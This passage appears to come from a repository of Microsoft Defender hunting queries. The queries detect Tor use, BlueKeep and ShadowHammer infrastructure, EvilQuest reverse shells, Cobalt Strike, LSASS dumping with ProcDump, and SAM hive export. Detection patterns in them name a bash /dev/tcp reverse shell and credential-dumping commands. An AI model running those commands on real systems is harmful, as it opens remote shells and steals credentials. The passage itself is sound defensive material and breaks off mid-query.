// We query for active Tor connections, but could alternatively have looked for Tor process starts (DeviceProcessEvents) or Tor downloads (DeviceFileEvents).
// To read more about this technique, see:
// Tor: https://attack.mitre.org/wiki/Software/S0183#Techniques_Used
// Meek plugin: https://attack.mitre.org/wiki/Software/S0175
// Multi-hop proxy technique: https://attack.mitre.org/wiki/Technique/T1188
// Tags: #Tor, #MultiHopProxy, #CnC
DeviceNetworkEvents
// Look back over the last three days
| where Timestamp > ago(3d) and InitiatingProcessFileName in~ ("tor.exe", "meek-client.exe")
// Returns MD5 hashes of files used by Tor, to enable you to block them.
// We count how prevalent each file is (by machines) and show examples for some of them (up to 5 machine names per hash).
| summarize MachineCount = dcount(DeviceName), MachineNames = make_set(DeviceName, 5) by InitiatingProcessMD5
| order by MachineCount desc

================================================
FILE: Command and Control/c2-bluekeep.md
================================================
# Detect command-and-control communication related to BlueKeep cryptomining

This query was originally published in the threat analytics report, *Exploitation of CVE-2019-0708 (BlueKeep)*.

[CVE-2019-0708](https://nvd.nist.gov/vuln/detail/CVE-2019-0708), also known as BlueKeep, is a critical remote code execution vulnerability involving RDP. Soon after its disclosure, the NSA issued a rare [advisory](https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/1865726/nsa-cybersecurity-advisory-patch-remote-desktop-services-on-legacy-versions-of/) about this vulnerability, out of concern that it could be used to quickly spread malware. Attackers have since used this vulnerability to [install cryptocurrency miners](https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining/) on targets.
Microsoft has issued [updates](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708) for this vulnerability, as well as [guidance](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708) for protecting operating systems that we no longer support. Microsoft Defender ATP also contains [behavioral detections](https://www.microsoft.com/security/blog/2019/11/07/the-new-cve-2019-0708-rdp-exploit-attacks-explained/) for defending against this threat.

The following query locates devices that have communicated with attacker infrastructure associated with BlueKeep-related cryptomining.

## Query
```Kusto
// Suggest setting Timestamp starting from September 6th
// when the BlueKeep Metasploit module was released
let IPs = pack_array("109.176.117.11", "5.100.251.106", "217.23.5.20", "5.135.199.19");
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP in(IPs)
```

## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also
* [Detect BlueKeep-related mining](../Execution/detect-bluekeep-related-mining.md)
* [Detect BlueKeep exploitation attempts](../Initial%20access/detect-bluekeep-exploitation-attempts.md)
* [Detect suspicious RDP activity related to BlueKeep](..\Lateral%20Movement\detect-suspicious-rdp-connections.md)

## Contributor info
**Contributor:** Microsoft Threat Protection team

================================================
FILE: Command and Control/check-for-shadowhammer-activity-download-domain.md
================================================
# Check for ShadowHammer-related download activity

This query was originally published in the threat analytics report, *ShadowHammer supply chain attack*.

[Operation ShadowHammer](https://www.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers) was an attack against ASUS computer hardware, using the company's own update infrastructure to deliver malware to the company's products. The campaign ran from June to November, 2018. ASUS has since [responded](https://www.asus.com/News/hqfgVUyZ6uyAyJe1) with updates that protect their Live Update system, and diagnostic tools to check affected systems.

The following query checks for activity associated with the ShadowHammer download domain over the past 30 days.
## Query
```
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl == "asushotfix.com" or RemoteIP == "141.105.71.116"
```

## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info
**Contributor:** Microsoft Threat Protection team

================================================
FILE: Command and Control/python-use-by-ransomware-macos.md
================================================
# Python usage associated with ransomware on macOS

This query was originally published in the threat analytics report, *EvilQuest signals the rise of Mac ransomware*.

As of the time of this writing (October 2020), ransomware designed to target macOS is relatively rare. EvilQuest is one of the few examples of this kind of malware on the platform.

The query below can help locate an attempt to run Python in service of malicious activity by a remote operator. The command the query searches for is associated with, but not definitely indicative of, EvilQuest infections.

Other queries related to EvilQuest ransomware can be found under the [See also](#see-also) section below.

## Query
```kusto
// ProcessCommandLine exists only in DeviceProcessEvents; DeviceFileEvents rows carry
// the launching process in InitiatingProcessCommandLine and so cannot match this filter
union DeviceFileEvents, DeviceProcessEvents
| where Timestamp >= ago(7d)
| where ProcessCommandLine contains "EIKKEIKK" and ProcessCommandLine contains "python"
```

## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also
* [Ransom note 'say' alert associated with ransomware on macOS](..\Impact\ransom-note-creation-macos.md)
* [Launching questd ransomware using osascript](..\Execution\launch-questd-w-osascript.md)
* [Reverse shell associated with ransomware on macOS](reverse-shell-ransomware-macos.md)

## Contributor info
**Contributor:** Microsoft Threat Protection team

================================================
FILE: Command and Control/recon-with-rundll.md
================================================
# Detect rundll32.exe being used for reconnaissance and command-and-control

This query was originally published in the threat analytics report, *Trickbot: Pervasive & underestimated*.

[Trickbot](https://attack.mitre.org/software/S0266/) is a very prevalent piece of malware with an array of malicious capabilities. Originally designed to steal banking credentials, it has since evolved into a modular trojan that can deploy other malware, disable security software, and perform command and control (C2) operations.

Trickbot operators are known to use the legitimate Windows process *rundll32.exe* to perform malicious activities, such as reconnaissance. Once a target is infected, the operator will drop a batch file that runs several commands and connects to a C2 server for further action.

The following query detects suspicious rundll32.exe activity associated with Trickbot campaigns.

See [Office applications launching wscript.exe to run JScript](../Execution/office-apps-launching-wscipt.md) for another query related to Trickbot activity.
## Query
```Kusto
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "rundll32.exe"
// Command line that is nothing but "rundll32.exe": no DLL or export argument at all
| where InitiatingProcessCommandLine has "rundll32.exe" and InitiatingProcessCommandLine !contains " " and InitiatingProcessCommandLine != ""
| summarize DestinationIPCount = dcount(RemoteIP), make_set(RemoteIP), make_set(RemoteUrl), make_set(RemotePort) by InitiatingProcessCommandLine, DeviceId, bin(Timestamp, 5m)
```

## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | v | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info
**Contributor:** Microsoft Threat Protection team

================================================
FILE: Command and Control/reverse-shell-ransomware-macos.md
================================================
# Reverse shell associated with ransomware on macOS

This query was originally published in the threat analytics report, *EvilQuest signals the rise of Mac ransomware*.

As of the time of this writing (October 2020), ransomware designed to target macOS is relatively rare. EvilQuest is one of the few examples of this kind of malware on the platform.

The query below can help locate a reverse shell established by an attacker. The command the query searches for is associated with, but not definitely indicative of, EvilQuest infections.

Other queries related to EvilQuest ransomware can be found under the [See also](#see-also) section below.
## Query
```kusto
// ProcessCommandLine exists only in DeviceProcessEvents; DeviceFileEvents rows carry
// the launching process in InitiatingProcessCommandLine and so cannot match this filter
union DeviceFileEvents, DeviceProcessEvents
| where Timestamp >= ago(7d)
| where ProcessCommandLine has "bash -i >& /dev/tcp/"
```

## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also
* [Ransom note 'say' alert associated with ransomware on macOS](..\Impact\ransom-note-creation-macos.md)
* [Launching questd ransomware using osascript](..\Execution\launch-questd-w-osascript.md)
* [Python usage associated with ransomware on macOS](python-use-by-ransomware-macos.md)

## Contributor info
**Contributor:** Microsoft Threat Protection team

================================================
FILE: Credential Access/Active Directory Sensitive Group Modifications.md
================================================
# Active Directory Sensitive/Tier 0 Group Modifications

This query shows all modifications to highly sensitive Active Directory groups (also known as Tier 0). Examples of these groups include Domain Admins, Schema Admins and Enterprise Admins.

More info can be found here:
https://docs.microsoft.com/en-us/security/compass/privileged-access-access-model#evolution-from-the-legacy-ad-tier-model
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory

This advanced hunting query requires Defender for Identity to be deployed, due to its reliance on the IdentityDirectoryEvents table.
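The query below splits each `Group Membership changed` record into an add (a `TO.GROUP` field is present) or a removal (`FROM.GROUP`), works out whether the target is a user or a nested group from `TARGET_OBJECT.USER` / `TARGET_OBJECT.GROUP`, and keeps only changes to a fixed Tier 0 group list. The Python below is an added, stand-alone example of that classification over constructed IdentityDirectoryEvents-like records; it is not code from this repository, the event dictionaries are made up, and unlike the Kusto join (which compares strings case-sensitively) the group comparison here is case-insensitive so that display-name case differences such as `ENTERPRISE DOMAIN CONTROLLERS` do not cause misses.

```python
"""Added example: classification of Defender for Identity group-membership
events against a Tier 0 group list, as the hunting query on this page does.
Not part of this repository; the sample events are constructed."""

# Tier 0 / protected groups from the query's datatable (case-folded for comparison).
TIER0_GROUPS = {
    "Enterprise Admins", "Domain Admins", "Domain Controllers", "Administrators",
    "Enterprise Key Admins", "Account Operators", "Organization Management",
    "Backup Operators", "RTCDomainServerAdmins", "ENTERPRISE DOMAIN CONTROLLERS",
    "Cert Publishers", "Schema Admins", "DnsAdmins", "Exchange Recipient Administrators",
    "Replicator", "Read-Only Domain Controllers", "Print Operators",
}
_TIER0_FOLDED = {g.casefold() for g in TIER0_GROUPS}


def classify(event: dict):
    """Return a row like the query's final projection for a Tier 0 membership
    change, or None when the event is not one."""
    if event.get("ActionType") != "Group Membership changed" or not event.get("AccountSid"):
        return None                                   # ActionType filter + isnotempty(AccountSid)
    fields = event.get("AdditionalFields") or {}
    if fields.get("TO.GROUP"):                        # ActivityType = "Added Account"
        activity, group = "Added Account", fields["TO.GROUP"]
    else:                                             # otherwise a removal, keyed by FROM.GROUP
        activity, group = "Removed Account", fields.get("FROM.GROUP", "")
    if group.casefold() not in _TIER0_FOLDED:
        return None
    user = fields.get("TARGET_OBJECT.USER")
    return {
        "Timestamp": event.get("Timestamp"),
        "ActionType": event["ActionType"],
        "ActivityType": activity,
        "TargetType": "User Account" if user else "Security Group",
        "ActorUpn": event.get("AccountUpn"),
        "TargetObject": user or fields.get("TARGET_OBJECT.GROUP", ""),
        "TargetAccountUpn": event.get("TargetAccountUpn"),
        "TargetGroup": group,
    }


def tier0_changes(events) -> list:
    """Rows for every Tier 0 add or removal, in event order."""
    return [row for row in (classify(e) for e in events) if row]


# Constructed sample events in the shape of IdentityDirectoryEvents rows (made-up SIDs and UPNs).
SAMPLE_EVENTS = [
    {"Timestamp": "2021-06-01T08:00:00Z", "ActionType": "Group Membership changed",
     "AccountUpn": "admin@corp.example", "AccountSid": "S-1-5-21-1-1-1-500",
     "TargetAccountUpn": "jdoe@corp.example",
     "AdditionalFields": {"TO.GROUP": "Domain Admins", "TARGET_OBJECT.USER": "jdoe"}},
    {"Timestamp": "2021-06-01T08:05:00Z", "ActionType": "Group Membership changed",
     "AccountUpn": "admin@corp.example", "AccountSid": "S-1-5-21-1-1-1-500",
     "TargetAccountUpn": "svc-backup@corp.example",
     "AdditionalFields": {"FROM.GROUP": "Backup Operators", "TARGET_OBJECT.USER": "svc-backup"}},
    {"Timestamp": "2021-06-01T08:10:00Z", "ActionType": "Group Membership changed",
     "AccountUpn": "admin@corp.example", "AccountSid": "S-1-5-21-1-1-1-500",
     "TargetAccountUpn": "",
     "AdditionalFields": {"TO.GROUP": "Administrators", "TARGET_OBJECT.GROUP": "Helpdesk-Tier2"}},
    {"Timestamp": "2021-06-01T08:15:00Z", "ActionType": "Group Membership changed",
     "AccountUpn": "admin@corp.example", "AccountSid": "S-1-5-21-1-1-1-500",
     "TargetAccountUpn": "jdoe@corp.example",
     "AdditionalFields": {"TO.GROUP": "Sales", "TARGET_OBJECT.USER": "jdoe"}},
    {"Timestamp": "2021-06-01T08:20:00Z", "ActionType": "Group Membership changed",
     "AccountUpn": "", "AccountSid": "",
     "TargetAccountUpn": "jdoe@corp.example",
     "AdditionalFields": {"TO.GROUP": "Schema Admins", "TARGET_OBJECT.USER": "jdoe"}},
]

if __name__ == "__main__":
    for row in tier0_changes(SAMPLE_EVENTS):
        print(row["Timestamp"], row["ActivityType"], row["TargetType"],
              row["TargetObject"], "->", row["TargetGroup"])
```

The third sample, a group nested into `Administrators`, is the case the query's `TARGET_OBJECT.GROUP` fallback exists for: a nested group grants every member of it Tier 0 rights, so it deserves the same attention as a direct user addition.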
## Query
```
// Detects changes in Tier 0 group memberships
// Command leverages MDI schema
// Execute from https://security.microsoft.com or through the M365D advanced hunting API
let Events = materialize (
    IdentityDirectoryEvents
    | where ActionType == 'Group Membership changed'
    | extend ActivityType = iff(isnotempty(tostring(AdditionalFields['TO.GROUP'])), "Added Account", "Removed Account")
    | where isnotempty(AccountSid)
);
let Tier0Adds = (
    Events
    | where ActivityType == "Added Account"
    | extend TargetGroup = tostring(AdditionalFields['TO.GROUP'])
    | extend TargetObject = iff(isempty(tostring(AdditionalFields['TARGET_OBJECT.USER'])), tostring(AdditionalFields['TARGET_OBJECT.GROUP']), tostring(AdditionalFields['TARGET_OBJECT.USER']))
    | extend TargetType = iff(isempty(tostring(AdditionalFields['TARGET_OBJECT.USER'])), "Security Group", "User Account")
    //| extend TargetObject = AdditionalFields['TARGET_OBJECT.USER']
);
let Tier0Removes = (
    Events
    | where ActivityType == "Removed Account"
    | extend TargetGroup = tostring(AdditionalFields['FROM.GROUP'])
    | extend TargetObject = iff(isempty(tostring(AdditionalFields['TARGET_OBJECT.USER'])), tostring(AdditionalFields['TARGET_OBJECT.GROUP']), tostring(AdditionalFields['TARGET_OBJECT.USER']))
    | extend TargetType = iff(isempty(tostring(AdditionalFields['TARGET_OBJECT.USER'])), "Security Group", "User Account")
);
// Group names must match the directory display names exactly (the join is case-sensitive)
let Tier0Groups = datatable(TargetGroup:string) [
    'Enterprise Admins',
    'Domain Admins',
    'Domain Controllers',
    'Administrators',
    'Enterprise Key Admins',
    'Account Operators',
    'Organization Management',
    'Backup Operators',
    'RTCDomainServerAdmins',
    'ENTERPRISE DOMAIN CONTROLLERS',
    'Cert Publishers',
    'Schema Admins',
    'DnsAdmins',
    'Exchange Recipient Administrators',
    'Replicator',
    'Read-Only Domain Controllers',
    'Print Operators'
];
Tier0Groups
| join (union Tier0Adds, Tier0Removes) on TargetGroup
| project Timestamp, ActionType, ActivityType, TargetType, ActorUpn = AccountUpn, TargetObject, TargetAccountUpn, TargetGroup
// If you are setting up a detection rule in M365D, you'll need to add ReportId and AccountSid to the projected columns
```

## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | V | |
| Defense evasion | | |
| Credential Access | V | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info
**Contributor:** Dylan J
**Organization:** Microsoft
**Twitter:** @Dylface2

================================================
FILE: Credential Access/Private Key Files.txt
================================================
/////////////////////////////////////////////////////////
// Private Key Files
//
// This query identifies file operations on files having
// one of the extensions commonly used to save a private
// key. The risk is that if an attacker were to obtain
// the file, they could brute force any password on it
// and potentially obtain a powerful certificate. To do
// this, they would only need to obtain read access to
// the file.
//
// The risk associated with these files is heavily
// determined by the value of the certificate. For example,
// loss of a self-signed certificate created by Adobe Acrobat
// is significantly less impactful than loss of a website
// SSL certificate.
//
// Recommendation: Know where these files are, and if possible
// back them up and remove them. You might also consider
// creating an informational alert.
//////////////////////////////////////////////////////////////
DeviceFileEvents
| where Timestamp > ago(7d)
| where FileName endswith '.pfx' or FileName endswith '.pfn' or FileName endswith '.p12'

================================================
FILE: Credential Access/cobalt-strike.md
================================================
# Find user accounts potentially affected by Cobalt Strike

This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/).

In April of 2020, security researchers observed multiple ransomware campaigns using the same set of techniques. The attackers would compromise a web-facing endpoint and employ tools such as Cobalt Strike to steal users' credentials.

[Cobalt Strike](https://www.cobaltstrike.com/) is commercial software used to conduct simulated threat campaigns against a target; however, malicious actors also use Cobalt Strike in real attacks. The software has a large range of [capabilities](https://attack.mitre.org/software/S0154/), including credential theft.

The following query identifies accounts that have logged on to compromised endpoints and have potentially had their credentials stolen.

> [!IMPORTANT]
> This query can only check endpoints onboarded to Microsoft Defender ATP.
>
> If you've identified affected endpoints that have not onboarded to Microsoft Defender ATP, check the Windows Event Log for post-compromise logons—those that occur during or after the earliest suspected breach activity—with event ID *4624* and logon type *2* or *10*. For any other timeframe, check for logon type *4* or *5*.

## Query
```Kusto
// Check for specific alerts
AlertInfo
// Attempts to clear security event logs.
| where Title in("Event log was cleared",
// List alerts flagging attempts to delete backup files.
"File backups were deleted",
// Potential Cobalt Strike activity - Note that other threat activity can also
// trigger alerts for suspicious decoded content
"Suspicious decoded content",
// Cobalt Strike activity
"\'Atosev\' malware was detected",
"\'Ploty\' malware was detected",
"\'Bynoco\' malware was detected")
| extend AlertTime = Timestamp
| join AlertEvidence on AlertId
| distinct DeviceName, AlertTime, AlertId, Title
| join DeviceLogonEvents on $left.DeviceName == $right.DeviceName
// Creating 10 day Window surrounding alert activity
| where Timestamp < AlertTime +5d and Timestamp > AlertTime - 5d
// Projecting specific columns
| project Title, DeviceName, DeviceId, Timestamp, LogonType, AccountDomain, AccountName, AccountSid, AlertTime, AlertId, RemoteIP, RemoteDeviceName
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | Attackers will not only dump credentials for accounts that have logged on to interactive or RDP sessions, but will also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry. |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | v | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Credential Access/doppelpaymer-procdump.md
================================================
# Detect DoppelPaymer operators dumping credentials with ProcDump

This query was originally published in the threat analytics report, *Doppelpaymer: More human-operated ransomware*. There is also a related [blog](https://msrc-blog.microsoft.com/2019/11/20/customer-guidance-for-the-dopplepaymer-ransomware/).

[DoppelPaymer](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DoppelPaymer!MTB&threatId=-2147205372) is ransomware that is spread manually by human operators. These operators have exhibited extensive knowledge of system administration and common network security misconfigurations. For example, they use Sysinternals utilities such as [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) to dump the memory of [LSASS](https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection), from which credentials can then be extracted offline. They often use these stolen credentials to turn off security software, run malicious commands, and spread malware throughout an organization.

The following query detects ProcDump being used to dump credentials from LSASS. The [See also](#See-also) section below lists links to other queries associated with DoppelPaymer.

## Query

```Kusto
// Dumping of LSASS memory using procdump
DeviceProcessEvents
| where Timestamp > ago(7d)
// Command lines that include "lsass" and the -accepteula or -ma flags used by procdump
| where (ProcessCommandLine has "lsass" and (ProcessCommandLine has "-accepteula" or ProcessCommandLine contains "-ma"))
// Also catch procdump invoked by file name against lsass, even when neither flag is present
    or (FileName in~ ('procdump.exe','procdump64.exe') and ProcessCommandLine has 'lsass')
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Detect DoppelPaymer performing reconnaissance with net.exe](../Discovery/doppelpaymer.md)
* [Detect DoppelPaymer operators spreading files with PsExec](../Lateral%20Movement/doppelpaymer-psexec.md)
* [Detect DoppelPaymer operators stopping services](../Defense%20evasion/doppelpaymer-stop-services.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Credential Access/identify-accounts-logged-on-to-endpoints-affected-by-cobalt-strike.md
================================================
# Identify accounts that have logged on to endpoints affected by Cobalt Strike

This query was originally published in the threat analytics report, *Ransomware continues to hit healthcare, critical services*.
It finds all user accounts that have logged on to an endpoint affected by [Cobalt Strike](https://attack.mitre.org/software/S0154/), a penetration testing tool. Assume that all credentials on endpoints affected by Cobalt Strike were available to attackers and that all associated accounts are compromised.

Note that attackers will not only dump credentials for accounts that have logged on to interactive or RDP sessions, but will also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.

## Query

```Kusto
// Check for specific alerts
AlertInfo
// This checks over the previous 7 days -- alter Timestamp value for other periods
| where Timestamp > ago(7d)
// Attempts to clear security event logs.
| where Title in("Event log was cleared",
// List alerts flagging attempts to delete backup files.
"File backups were deleted",
// Potential Cobalt Strike activity - Note that other threat activity can also trigger alerts for suspicious decoded content
"Suspicious decoded content",
// Cobalt Strike activity
"\'Atosev\' malware was detected",
"\'Bynoco\' malware was detected",
"\'Cosipor\' malware was detected")
| extend AlertTime = Timestamp
| join AlertEvidence on AlertId
| project DeviceId, AlertTime, AlertId, Title
| join DeviceLogonEvents on DeviceId
// Creating 10 day Window surrounding alert activity
| where Timestamp < AlertTime +5d and Timestamp > AlertTime - 5d
// Projecting specific columns
| project Title, DeviceName, DeviceId, Timestamp, LogonType, AccountDomain, AccountName, AccountSid, AlertTime, AlertId, RemoteIP, RemoteDeviceName
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | If you've identified affected endpoints that have not onboarded to Microsoft Defender ATP, check the Windows Event Log for post-compromise logons, those that occur after or during the earliest suspected breach activity, with *event ID 4624* and *logon type 2* or *10*. For any other timeframe, check for *logon type 4* or *5*. |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Credential Access/lazagne.md
================================================
# Detect credential theft via SAM database export by LaZagne

This query was originally published in the threat analytics report, *Ryuk ransomware*. There is also a related [blog](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/).

[Ryuk](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ryuk&threatId=-2147232689) is human-operated ransomware. Much like [DoppelPaymer](https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/) ransomware, Ryuk is spread manually, often on networks that are already infected with Trickbot.

During a typical Ryuk campaign, an operator will use [LaZagne](https://github.com/AlessandroZ/LaZagne), a credential theft tool, to access stored passwords for service accounts. The accounts are then used to jump from desktop clients to servers or domain controllers, allowing for better reconnaissance, faster movement, and a more severe impact on the target.

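An exported SAM hive is of limited use on its own: the hashes in it are encrypted with the boot key held in the SYSTEM hive, and the SECURITY hive holds the LSA secrets (service account passwords) referred to elsewhere on this page. The query below is an added example, not part of this repository, that extends the detection in this file: it looks for `reg.exe save` or `export` of any of the three hives, pulls the hive name out with a regular expression so that `HKEY_LOCAL_MACHINE\SAM` matches as well as `hklm\sam`, and groups the results per device and account in 10-minute bins so that a SAM+SYSTEM pair, the combination that can be cracked offline, stands out. The 10-minute bin and the 7-day lookback are assumptions.

```kusto
let lookback = 7d;
DeviceProcessEvents
| where Timestamp > ago(lookback)
| where FileName =~ "reg.exe"
| where ProcessCommandLine has_any ("save", "export")
// Extract the hive name from either the short (hklm\sam) or the long (HKEY_LOCAL_MACHINE\SAM) form
| extend Hive = tolower(extract(@"(?i)(?:hklm|hkey_local_machine)\\(sam|system|security)\b", 1, ProcessCommandLine))
| where isnotempty(Hive)
// Group hive exports that happen close together under the same account on the same device
| summarize HivesDumped = make_set(Hive), FirstSeen = min(Timestamp), LastSeen = max(Timestamp),
            CommandLines = make_set(ProcessCommandLine, 5), Parents = make_set(InitiatingProcessFileName)
  by DeviceId, DeviceName, InitiatingProcessAccountName, Window = bin(Timestamp, 10m)
// SAM hashes are only recoverable offline together with the boot key from SYSTEM
| extend CrackableOffline = set_has_element(HivesDumped, "sam") and set_has_element(HivesDumped, "system")
| project-away Window
| order by CrackableOffline desc, FirstSeen asc
```

Rows where `CrackableOffline` is true are the ones to treat as a completed credential theft; a lone SAM or SECURITY export is still worth a look, since the operator may fetch the companion hive by another route.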
The following query detects credential theft by LaZagne. The [See also](#See-also) section below lists links to other queries associated with Ryuk ransomware.

## Query

```Kusto
// Find credential theft via SAM database export by LaZagne
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ 'reg.exe'
    and ProcessCommandLine has 'save'
    and ProcessCommandLine has 'hklm'
    and ProcessCommandLine has 'sam'
| project DeviceId, Timestamp, InitiatingProcessId, InitiatingProcessFileName, ProcessId, FileName, ProcessCommandLine
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Detect PsExec being used to spread files](../Lateral%20Movement/remote-file-creation-with-psexec.md)
* [Detect Cobalt Strike invoked via WMI](../Campaigns/cobalt-strike-invoked-w-wmi.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Credential Access/logon-attempts-after-malicious-email.md
================================================
# Logon attempts after receipt of malicious email

This query finds up to 10 logons performed by email recipients within 30 minutes after they received known malicious emails (`take 10` returns an arbitrary sample, not the latest ones). You can use this query to check whether the accounts of the email recipients have been compromised.

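The query in this file keys the join on the local part of the recipient address, which matches `AccountName` only where the mailbox name and the account name coincide, and samples the result with `take`. The query below is an added example, not part of this repository, that joins identity logons on the full UPN and endpoint logons on the account name, drops mail that was blocked at delivery (it could not have been opened), and summarizes every successful logon in the window per recipient and message instead of sampling. It assumes the recipient address equals the user's UPN and that its local part equals the account name seen on devices; the `Phish` threat type and the 7-day lookback are additions to the original's `Malware`-only filter.

```kusto
let window = 30min;
let lookback = 7d;
let maliciousMail = EmailEvents
| where Timestamp > ago(lookback)
| where ThreatTypes has_any ("Malware", "Phish")
| where DeliveryAction !~ "Blocked"        // blocked mail never reached a mailbox
| extend Recipient = tolower(RecipientEmailAddress)
| project EmailTime = Timestamp, NetworkMessageId, Subject, SenderFromAddress, Recipient;
// Identity logons carry the UPN; endpoint logons carry only the account name, so each source gets its own key.
// Assumption: the recipient address is the UPN and its local part is the account name.
let logons = union
    (IdentityLogonEvents
     | where Timestamp > ago(lookback) and ActionType == "LogonSuccess"
     | project LogonTime = Timestamp, Key = tolower(AccountUpn), Source = "Identity",
               Host = DeviceName, LogonType, IPAddress
     | where isnotempty(Key)),
    (DeviceLogonEvents
     | where Timestamp > ago(lookback) and ActionType == "LogonSuccess"
     | project LogonTime = Timestamp, Key = tolower(AccountName), Source = "Device",
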